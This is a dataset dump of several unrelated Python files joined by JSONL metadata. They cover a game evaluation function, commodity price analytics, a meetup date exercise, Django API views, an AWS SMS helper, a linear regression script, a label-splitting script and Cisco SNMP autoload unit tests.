board_old.is_over():\n return -INF\n if board_new.is_over():\n return INF\n\n _adv = adv(board_new) - adv(board_old)\n _back = adv(board_new) - back(board_old)\n _cent = cent(board_new) - cent(board_old)\n _cntr = cntr(board_new) - cntr(board_old)\n _deny = deny(board_new) - deny(board_old)\n _kcent = kcent(board_new) - kcent(board_old)\n _mob = mob(board_new) - mob(board_old)\n _mobil = _mob - _deny\n _mov = mov(board_new) - mov(board_old)\n _thret = thret(board_new) - thret(board_old)\n\n undenied_mobility = 1 if _mobil > 0 else 0\n total_mobility = 1 if _mob > 0 else 0\n denial_of_occ = 1 if _deny > 0 else 0\n control = 1 if _cent > 0 else 0\n\n _demmo = 1 if denial_of_occ and not total_mobility else 0\n _mode_2 = 1 if undenied_mobility and not denial_of_occ else 0\n _mode_3 = 1 if not undenied_mobility and denial_of_occ else 0\n _moc_2 = 1 if not undenied_mobility and control else 0\n _moc_3 = 1 if undenied_mobility and not control else 0\n _moc_4 = 1 if not undenied_mobility and not control else 0\n\n return sum([\n _moc_2 * (-1) * (2**18),\n _kcent * (2**16),\n _moc_4 * (-1) * (2**14),\n _mode_3 * (-1) * (2**13),\n _demmo * (-1) * (2**11),\n _mov * (2 ** 8),\n _adv * (-1) * (2**8),\n _mode_2 * (-1) * (2**8),\n _back * (-1) * (2**6),\n _cntr * (2**5),\n _thret * (2**5),\n _moc_3 * (2**4),\n piece_score_diff(board_new, board_old.active) * (2**20),\n position_score(board_new, board_old.active) * (2**14),\n ])\n", "sub_path": "agents/arthur.py", "file_name": "arthur.py", "file_ext": "py", "file_size_in_byte": 2031, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.Player", "line_number": 10, "usage_type": "name"}, {"api_name": "utils.INF", "line_number": 14, "usage_type": "name"}, {"api_name": "utils.INF", "line_number": 16, "usage_type": "name"}, {"api_name": "utils.adv", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.adv", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.back", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.cent", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.cntr", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.deny", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.kcent", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.mob", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.mov", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.thret", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.piece_score_diff", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.position_score", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "436729785", "text": "import pandas as pd\nimport plotly.offline as plt\nimport plotly.graph_objs as go\nimport numpy as np\nimport os\n\n\ndef nearest(date_range, date):\n date_difference = np.abs(date_range - date)\n return date_difference == min(date_difference)\n\n\ndef state_commodity_time_analysis(dataset, state, commodity, default_request, date_range):\n data = dataset[dataset['Reported Date'].isin(date_range)]\n data = data[(data['State Name'] == state) & (data['Commodity'] == commodity)]\n data = data.sort_values(by='Reported Date')\n if data.empty:\n return False\n # data = data[data['Min Price (Rs./Quintal)'] != 0]\n color = ['#1B5E20', '#006064', '#D50000']\n title = 'Arrivals Range (Tonnes)'\n if str(default_request).strip(\"['']\") != 'Arrivals (Tonnes)':\n title = 'Price Range (Rs. per Quintal)'\n data = data.groupby('Reported Date', as_index=False).agg(np.mean)\n else:\n data = data.groupby('Reported Date', as_index=False).agg(np.sum)\n time_series = [\n go.Scatter(\n x=data['Reported Date'],\n y=data[default_request[i]],\n line=dict(color=color[i]),\n name=default_request[i]\n )\n for i in range(len(default_request))\n ]\n time_series_layout = go.Layout(\n title='Time Series chart of ' + commodity + ' in ' + state + ' State from ' + str(date_range[0])[:10] + ' to ' +\n str(date_range[-1])[:10],\n xaxis=dict(title='Time line',\n rangeslider=dict(visible=True),\n type='date'),\n yaxis=dict(title=title)\n )\n time_series_figure = go.Figure(data=time_series, layout=time_series_layout)\n if os.path.exists('../outputs/state_commodity_time_analysis.html'):\n os.remove('../outputs/state_commodity_time_analysis.html')\n plt.plot(time_series_figure, filename='../outputs/state_commodity_time_analysis.html')\n return True\n\n\ndef maxmin_of_commodity(dataset, commodity, price_degree, state, default_request, number):\n group_param1 = dataset['Commodity'] == commodity\n df = dataset[group_param1]\n if state != 'India':\n group_param2 = df['State Name'] == state\n df = df[group_param2]\n if df.empty:\n return 'No such records found'\n if default_request != 'Arrivals (Tonnes)':\n df = df.groupby('Market Name', as_index=False).agg(np.mean)\n else:\n df = df.groupby('Market Name', as_index=False).agg(np.sum)\n if price_degree == 'Max':\n df = df.sort_values(by=default_request, ascending=False)\n else:\n df = df.sort_values(by=default_request, ascending=True)\n if number > len(df) or number <= 0:\n number = len(df)\n if price_degree == 'Max':\n df = df.sort_values(by=default_request, ascending=False).head(number)\n else:\n df = df.sort_values(by=default_request, ascending=True).head(number)\n if number > 1:\n message = 'Top ' + str(number) + ' ' + default_request + ' for ' + commodity + ' are: \\n' + default_request + \\\n ' | Market Name\\n'\n speech = ''\n for i in range(number):\n speech += str(round(df[default_request].values[i], 2)) + ' | ' + \\\n str(df[df[default_request] == df[default_request].values[i]]['Market Name'].unique()).strip('[]') \\\n + '\\n'\n return message + speech\n speech = \"Commodity: \" + commodity + \" has observed \" + default_request + \" of \" + \\\n str(round(df[default_request].values[0], 2)).strip('[]') + \" in \" \\\n + str(df[df[default_request] == df[default_request].values[0]]['Market Name'].unique()).strip('[]') + \\\n \" market(s) of \" + state\n return speech\n\n\ndef datewise_commodity_info(dataset, commodity, state, district, default_request, date):\n val = dataset.loc[\n (dataset['Commodity'] == commodity) & (dataset['State Name'] == state) &\n (dataset['District Name'] == district)]\n if val.empty:\n print('No such data recorded. Please ascertain the veracity of information provided.')\n return 'No such data recorded. Please ascertain the veracity of information provided.'\n else:\n ret_val = val[val['Reported Date'] == date]\n if ret_val.empty:\n position = nearest(val['Reported Date'], date)\n val = val.loc[position]['Reported Date'].unique()\n speech = ''\n for i in range(len(val)):\n speech += str(val[i])[:10] + '\\n'\n return 'No such information found on ' + str(date)[:10] + '. Nearest dates for the requested information' \\\n ' are: \\n' + speech\n else:\n if default_request == 'Arrivals (Tonnes)':\n output = round(ret_val[default_request].sum(), 2)\n return_val = 'Total arrival of ' + commodity + ' on ' + str(date)[:10] + ' is ' + str(output)\n else:\n output = round(ret_val[default_request].mean(), 2)\n return_val = 'Average of ' + default_request + ' of ' + commodity + ' on ' + str(date)[:10] \\\n + ' is ' + str(output)\n return return_val + '\\nMarket Name, Variety, ' + default_request + '\\n' + \\\n str(ret_val[['Market Name', 'Variety', default_request]].values)\n\n\ndef states_price_comparison(dataset, state_list, default_request, commodity, date_range):\n df = dataset[dataset['Reported Date'].isin(date_range)]\n df = df[df['State Name'].isin(state_list)]\n df = df[df['Commodity'] == commodity]\n if df.empty:\n return False\n df = df[df[default_request] != 0]\n df = df.groupby(['State Name', 'Reported Date'], as_index=False).agg(np.mean)\n df = df.sort_values(by='Reported Date')\n color_list = ['#9E9D24', '#3E2723', '#76FF03', '#5E35B1', '#1DE9B6']\n time_series_comparison = [\n go.Scatter(\n x=df['Reported Date'],\n y=(df[df['State Name'] == state_list[i]])[default_request],\n line=dict(color=color_list[i % 10]),\n name=state_list[i]\n )\n for i in range(len(state_list))\n ]\n\n time_series_comparison_layout = go.Layout(\n title='Time Series chart of states comparison in average ' + default_request + ' of ' + commodity,\n xaxis=dict(title='Time line',\n rangeslider=dict(visible=True),\n type='date'),\n yaxis=dict(title=default_request)\n )\n\n time_series_comparison_figure = go.Figure(data=time_series_comparison, layout=time_series_comparison_layout)\n if os.path.exists('../outputs/states_price_comparison.html'):\n os.remove('../outputs/states_price_comparison.html')\n plt.plot(time_series_comparison_figure, filename='../outputs/states_price_comparison.html')\n return True\n\n\ndef get_n_commodity(df, default_request, price_degree, date, number):\n val = df\n if date != 'None':\n date = date[:10]\n date = pd.to_datetime(date, infer_datetime_format=True)\n val = df.loc[(df['Reported Date'] == date)]\n if val.empty:\n print('No such data recorded. Please ascertain the veracity of information provided.')\n position = nearest(df['Reported Date'], date)\n val = df.loc[position]['Reported Date'].unique()\n speech = ''\n for i in range(len(val)):\n speech += str(val[i])[:10] + '\\n'\n return 'No such information found on ' + str(date)[:10] + '. Nearest dates for the requested information' \\\n ' are: \\n' + speech\n else:\n if default_request == 'Arrivals (Tonnes)':\n df = val.groupby('Commodity', as_index=False).agg(np.sum)\n else:\n df = val.groupby('Commodity', as_index=False).agg(np.mean)\n if number > len(df) or number <= 0:\n number = len(df)\n if price_degree == 'Max':\n df = df.sort_values(by=default_request, ascending=False).head(number)\n print(df[[default_request, 'Commodity']])\n else:\n df = df.sort_values(by=default_request, ascending=True).head(number)\n print(df[[default_request, 'Commodity']])\n return str(df['Commodity'].values).strip('[]')\n", "sub_path": "src/webhook_methods.py", "file_name": "webhook_methods.py", "file_ext": "py", "file_size_in_byte": 8284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.abs", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 26, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 28, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 28, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 36, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 36, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 44, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 44, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 46, "usage_type": "call"}, {"api_name": "plotly.offline.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 125, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 129, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 129, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 138, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 138, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 146, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 146, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 148, "usage_type": "call"}, {"api_name": "plotly.offline.plot", "line_number": 149, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 149, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 172, "usage_type": "attribute"}]} +{"seq_id": "124830171", "text": "'''\nCreated on Oct 20, 2014\n\n@author: jbarni00\n'''\n#meetup_day(2013, 5, 'Monday', 'teenth')\nimport datetime\nimport calendar\n\ndef meetup_day(year, month, dayofweek, increment):\n # Get day of week of first of month\n\n\n week = {'Sunday': 0, \n 'Monday' :1, \n 'Tuesday': 2, \n 'Wednesday': 3, \n 'Thursday' : 4, \n 'Friday': 5, \n 'Saturday': 6 }\n \n\n dayone, numberofdays = calendar.monthrange(year, month)\n # Sunday is a special case, normaize to 0-7\n\n if dayone == 6:\n dayone = 0\n else:\n dayone = dayone+1\n\n if dayone <= week[dayofweek]:\n firstdate = 1 + ( week[dayofweek] - dayone)\n else:\n firstdate = 1 + 7 - ( dayone - week[dayofweek])\n\n if increment == 'teenth':\n potentialday = firstdate\n while potentialday < 13:\n potentialday += 7\n return datetime.date(year, month, potentialday)\n\n if increment == 'first' or increment == '1st':\n return datetime.date(year, month, firstdate)\n \n if increment == '2nd':\n return datetime.date(year, month, firstdate +7 )\n \n if increment == '3rd':\n return datetime.date(year, month, firstdate + 14)\n \n if increment == '4th':\n return datetime.date(year, month, firstdate + 21 )\n \n if increment == 'last':\n potentialday = firstdate + 35\n while potentialday > numberofdays:\n potentialday -=7\n return datetime.date(year, month, potentialday)\n \n \n", "sub_path": "all_data/exercism_data/python/meetup/a2d4c77a2b644aea953033a6e3c4efc4.py", "file_name": "a2d4c77a2b644aea953033a6e3c4efc4.py", "file_ext": "py", "file_size_in_byte": 1547, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "calendar.monthrange", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "422445787", "text": "import sys\nimport logging\nfrom time import time\nimport json\n\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.exceptions import PermissionDenied\nfrom django.db import connection\nfrom django.db.models import Count, Min, Sum, Avg\nfrom django.forms.models import model_to_dict\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.utils.timezone import utc\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.views.decorators.http import require_POST\n\nimport functions\nfrom models import Device, Configuration, DeviceConfiguration, Sensor, Notification\nfrom helpers import create_json_response\n\n\nlogger = logging.getLogger('django')\n\n\ndef index(request):\n return redirect('/static/index.html', permanent=True)\n\n\ndef api_index(request):\n return create_json_response({'version': 0.2}, request)\n\n\n@require_POST\n@sensitive_post_parameters('password')\ndef login_user(request):\n if 'username' in request.POST and 'password' in request.POST:\n user = authenticate(username=request.POST[\n 'username'], password=request.POST['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n return create_json_response({\"login\": \"successful\", \"user\": request.user.get_full_name()}, request)\n else:\n return create_json_response({\"login\": \"disabled\", \"user\": request.user.get_full_name()}, request)\n else:\n return create_json_response({\"login\": \"invalid\"}, request)\n else:\n return create_json_response({\"login\": \"failed\"}, request)\n\n\ndef logout_user(request):\n logout(request)\n return create_json_response({\"logout\": \"successful\"}, request)\n\n\ndef status(request):\n output = [\n (\"system_status\", functions.get_configuration(\"system_status\", False))]\n output.append(\n (\"system_mode\", functions.get_configuration(\"system_mode\", False)))\n output.append((\"login\", request.user.is_authenticated()))\n\n if request.user.is_authenticated():\n output.append((\"user\", request.user.get_full_name()))\n output.append((\"admin\", request.user.is_superuser))\n output.append(\n (\"auto_optimization\", functions.get_configuration(\"auto_optimization\", False)))\n\n return create_json_response(dict(output), request)\n\n\n@require_POST\ndef export_csv(request):\n if not request.user.is_authenticated():\n raise PermissionDenied\n\n response = HttpResponse(content_type='text/csv')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"export_%s.csv\"' % time()\n\n if 'csv' in request.POST:\n response.write(request.POST['csv'])\n\n return response\n\n\ndef list_settings(request):\n if not request.user.is_authenticated():\n raise PermissionDenied\n\n output = []\n output += functions.get_configurations()\n output += functions.get_device_configurations()\n return create_json_response(dict(output), request)\n\n\ndef list_sensors(request):\n if not request.user.is_authenticated():\n raise PermissionDenied\n\n sensors = Sensor.objects.filter(in_diagram=True).values(\n 'id', 'name', 'unit', 'device__name', 'aggregate_sum', 'aggregate_avg')\n\n # rename device__name to device for convenience\n output = [{'id': x['id'], 'name': x['name'], 'unit': x['unit'], 'device': x['device__name'], 'sum': x['aggregate_sum'], 'avg': x['aggregate_avg']}\n for x in sensors]\n\n return create_json_response(output, request)\n\n\ndef list_notifications(request, start, end):\n if not request.user.is_authenticated():\n raise PermissionDenied\n\n start = 0 if start is None else start\n end = 25 if end is None else end\n\n if request.user.is_superuser:\n notifications = Notification.objects.all()\n else:\n notifications = Notification.objects.filter(\n threshold__show_manager=True)\n\n notifications = notifications.select_related()\n\n output = {\n 'total': len(notifications),\n 'notifications': []\n }\n\n for notification in notifications.order_by('-sensor_value__timestamp')[int(start):int(end)]:\n output['notifications'].append({\n 'id': notification.id,\n 'threshold': model_to_dict(notification.threshold),\n 'sensor_value': model_to_dict(notification.sensor_value),\n 'read': notification.read,\n 'target': notification.target,\n })\n\n return create_json_response(output, request)\n", "sub_path": "server/hooks.py", "file_name": "hooks.py", "file_ext": "py", "file_size_in_byte": 4591, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 27, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 42, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 43, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 45, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 47, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 49, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 34, "usage_type": "name"}, {"api_name": "django.views.decorators.debug.sensitive_post_parameters", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 53, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 54, "usage_type": "call"}, {"api_name": "functions.get_configuration", "line_number": 59, "usage_type": "call"}, {"api_name": "functions.get_configuration", "line_number": 61, "usage_type": "call"}, {"api_name": "functions.get_configuration", "line_number": 68, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 70, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 76, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 78, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 73, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 90, "usage_type": "name"}, {"api_name": "functions.get_configurations", "line_number": 93, "usage_type": "call"}, {"api_name": "functions.get_device_configurations", "line_number": 94, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 95, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 100, "usage_type": "name"}, {"api_name": "models.Sensor.objects.filter", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Sensor.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Sensor", "line_number": 102, "usage_type": "name"}, {"api_name": "helpers.create_json_response", "line_number": 109, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 114, "usage_type": "name"}, {"api_name": "models.Notification.objects.all", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Notification.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Notification", "line_number": 120, "usage_type": "name"}, {"api_name": "models.Notification.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Notification.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.Notification", "line_number": 122, "usage_type": "name"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 135, "usage_type": "call"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 136, "usage_type": "call"}, {"api_name": "helpers.create_json_response", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "434700991", "text": "import boto3\n\ndef send_sms(phone, text_body):\n sns = boto3.client('sns')\n response = sns.publish(\n PhoneNumber=phone,\n Message=text_body, \n MessageAttributes={\n \"AWS.SNS.SMS.SMSType\": {\n \"DataType\": \"String\",\n \"StringValue\": \"Transactional\"\n }\n },\n )\n\n # print(\"\\n\", response)\n return response\n\n\n# send_sms(\"+13175142678\", \"hello drew\")\n\n", "sub_path": "send_sms.py", "file_name": "send_sms.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "boto3.client", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "548412489", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#collecting x and y value\n\ndata= pd.read_csv('/home/admin1/Downloads/bike_sharing.csv')\n\nY= data['cnt'].values\nX= data['temp'].values\n\nprint(X)\nprint(Y)\n\nmean_x= np.mean(X)\nmean_y=np.mean(Y)\n\n#total no of values\nm= len(X)\n\n#using formula calculate b1 and b0\n\nnumber=0\ndenom=0\n\nfor i in range(m):\n number +=(X[i]-mean_x)*(Y[i]-mean_y)\n denom +=(X[i]-mean_x)**2\n\n b1=number/denom\n b0=mean_y-(b1*mean_x)\n\n #print coefficients\n\nprint(b1,b0)\n\n#plotting values and regresstion line\n\nmax_x= np.max(X)\nmin_x =np.min(X)\n\n#calculating line values x and y\n\nx = np.linspace(min_x,max_x,50)\ny= b0 + b1 * x\n\n\n#Plotting line\n\nplt.plot(x,y , color='red',label='Regresstion Line')\nplt.scatter(X,Y,color='blue',label='Scatter plot')\nplt.xlabel('Temperature')\nplt.ylabel('Count')\nplt.legend()\nplt.show()\n\n", "sub_path": "SlinearDirectory/SlinerProblem2.py", "file_name": "SlinerProblem2.py", "file_ext": "py", "file_size_in_byte": 874, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "393208582", "text": "import os\nimport json\nimport random\n\nlabels = '/home/jrola/PycharmProjects/pytorch_CTM/hmdb4_labels.csv'\nnew_labels20 = '/home/jrola/PycharmProjects/pytorch_CTM/hmdb4_labels20.csv'\nnew_labels80 = '/home/jrola/PycharmProjects/pytorch_CTM/hmdb4_labels80.csv'\nclass_name_to_label_path = '/home/jrola/PycharmProjects/pytorch_CTM/class_name_to_label.json'\n\nrandom.seed()\n\nif os.path.isfile(labels) == False:\n print(\"No File\")\n exit()\n\nwith open(class_name_to_label_path, 'r') as json_file:\n x = json.load(json_file)\n\ncount = 0\nlineC = 0\nsuffixCount = 0\nsuffixSum = 0\ncount80 = 0\ncount20 = 0\nnumLabels = int(input(\"Number of labels: \"))\n\nfor (k, v) in x.items():\n with open(labels, 'r') as fp:\n lineC = 0\n suffixCount = 0\n for line in fp:\n lineC = lineC + 1\n if line.endswith(\",\" + str(v) + \"\\n\"):\n suffixCount = suffixCount + 1\n if random.random() > 0.80:\n with open(new_labels20, 'a') as fp2:\n fp2.write(line)\n count20 = count20 + 1\n else:\n with open(new_labels80, 'a') as fp3:\n fp3.write(line)\n count80 = count80 + 1\n print(k + \" \" + str(suffixCount))\n count = count + 1\n suffixSum = suffixSum + suffixCount\n if v == (numLabels - 1):\n break\ncountSum = count80 + count20\n#print(suffixCount)\nprint(lineC - 1)\nprint(suffixSum)\nprint(countSum)\n", "sub_path": "anterior/2semana/label_to_test.py", "file_name": "label_to_test.py", "file_ext": "py", "file_size_in_byte": 1486, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "random.seed", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 17, "usage_type": "call"}, {"api_name": "random.random", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "283464025", "text": "from unittest import TestCase\nfrom mock import MagicMock, patch\nfrom cloudshell.devices.standards.networking.autoload_structure import GenericChassis, GenericPort\nfrom cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload import CiscoGenericSNMPAutoload\nfrom cloudshell.snmp.quali_snmp import QualiMibTable\n\n\nclass TestsCiscoGenericSNMPAutoload(TestCase):\n def setUp(self):\n self._snmp_handler = MagicMock()\n self._shell_name = \"\"\n self._shell_type = \"CS_switch\"\n self._logger = MagicMock()\n self._resource_name = \"resource\"\n self.cisco_snmp_autoload = CiscoGenericSNMPAutoload(self._snmp_handler,\n self._shell_name,\n self._shell_type,\n self._resource_name,\n self._logger)\n\n def test_load_cisco_mib(self):\n self.cisco_snmp_autoload.load_cisco_mib()\n self._snmp_handler.update_mib_sources.called_once()\n\n def test_is_valid_device_os_success(self):\n mib = \"SNMPv2-MIB\"\n mib_property = \"sysDescr\"\n mib_index = \"0\"\n self._snmp_handler.get_property.return_value = \"valid\"\n self.cisco_snmp_autoload._is_valid_device_os([\".*\"])\n self._snmp_handler.get_property.called_once_with(mib, mib_property, mib_index)\n\n def test_is_valid_device_os_raises(self):\n mib = \"SNMPv2-MIB\"\n mib_property = \"sysDescr\"\n mib_index = \"0\"\n supported_os = [\"1\"]\n self._snmp_handler.get_property.return_value = \"valid\"\n try:\n self.cisco_snmp_autoload._is_valid_device_os(supported_os)\n except Exception as e:\n self.assertIn('Incompatible driver! Please use this driver for \\'{0}\\' operation system(s)'.\n format(str(tuple(supported_os))), e.args)\n self._snmp_handler.get_property.called_once_with(mib, mib_property, mib_index)\n\n def test_get_device_model(self):\n model_name = \"cevModelName\"\n mib = 'SNMPv2-MIB'\n mib_property = 'sysObjectID'\n mib_index = '0'\n self._snmp_handler.get_property.return_value = \"Cisco::{0}\".format(model_name)\n result = self.cisco_snmp_autoload._get_device_model()\n self._snmp_handler.get_property.called_once_with(mib, mib_property, mib_index)\n self.assertEqual(model_name, result)\n\n def test_get_device_os_version(self):\n version = \"12.3.S(3).45\"\n mib = 'SNMPv2-MIB'\n mib_property = 'sysDescr'\n mib_index = '0'\n self._snmp_handler.get_property.return_value = \"Version {0} \".format(version)\n result = self.cisco_snmp_autoload._get_device_os_version()\n self._snmp_handler.get_property.called_once_with(mib, mib_property, mib_index)\n self.assertEqual(version, result)\n\n def test_get_device_model_name(self):\n model_name = \"model name\"\n with patch(\n \"cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload.get_device_name\") as get_dev_name_mock:\n self.cisco_snmp_autoload._get_device_model_name(model_name)\n get_dev_name_mock.called_once_with(model_name)\n\n @patch(\"cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload.SnmpIfTable\")\n @patch(\"cloudshell.networking.cisco.autoload.cisco_generic_snmp_autoload.CiscoSNMPEntityTable\")\n def test_load_snmp_tables(self, snmp_ent_tbl_mock, snmp_if_tbl_mock):\n snmp_ent_tbl_mock.get_entity_table.return_value = QualiMibTable(\"EntPhysicalTable\", {1: {\"entPhysicalClass\": \"chassis\"}})\n self.cisco_snmp_autoload._load_snmp_tables()\n snmp_if_tbl_mock.return_value.called_once_with(self._snmp_handler, self._logger)\n snmp_ent_tbl_mock.return_value.called_once_with(self._snmp_handler, self._logger, snmp_if_tbl_mock)\n snmp_ent_tbl_mock.return_value.get_entity_table.called_once()\n\n def test_add_element(self):\n uniqe_id = \"{}.{}.{}\".format(self._resource_name, \"chassis\", \"some_id\")\n relative_path = \"0\"\n chassis = GenericChassis(shell_name=self._shell_name,\n name=\"Chassis {}\".format(0),\n unique_id=\"{}.{}.{}\".format(self._resource_name, \"chassis\", uniqe_id))\n self.cisco_snmp_autoload._add_element(relative_path, chassis)\n self.assertTrue(self.cisco_snmp_autoload.elements[relative_path] == chassis)\n self.assertTrue(self.cisco_snmp_autoload.resource.resources[\"CH\"][relative_path][-1] == chassis)\n port_relative_path = \"0/0\"\n port_uniqe_id = \"{}.{}.{}\".format(self._resource_name, \"port\", \"some_id\")\n port = GenericPort(shell_name=self._shell_name,\n name=\"GigabitEthernet {}\".format(port_relative_path),\n unique_id=\"{}.{}.{}\".format(self._resource_name, \"port\", port_uniqe_id))\n self.cisco_snmp_autoload._add_element(port_relative_path, port)\n self.assertTrue(self.cisco_snmp_autoload.elements[port_relative_path] == port)\n self.assertTrue(self.cisco_snmp_autoload.resource.resources[\"CH\"][relative_path][-1].resources[\"P\"][relative_path][-1])\n\n def test_discovery(self):\n pass\n", 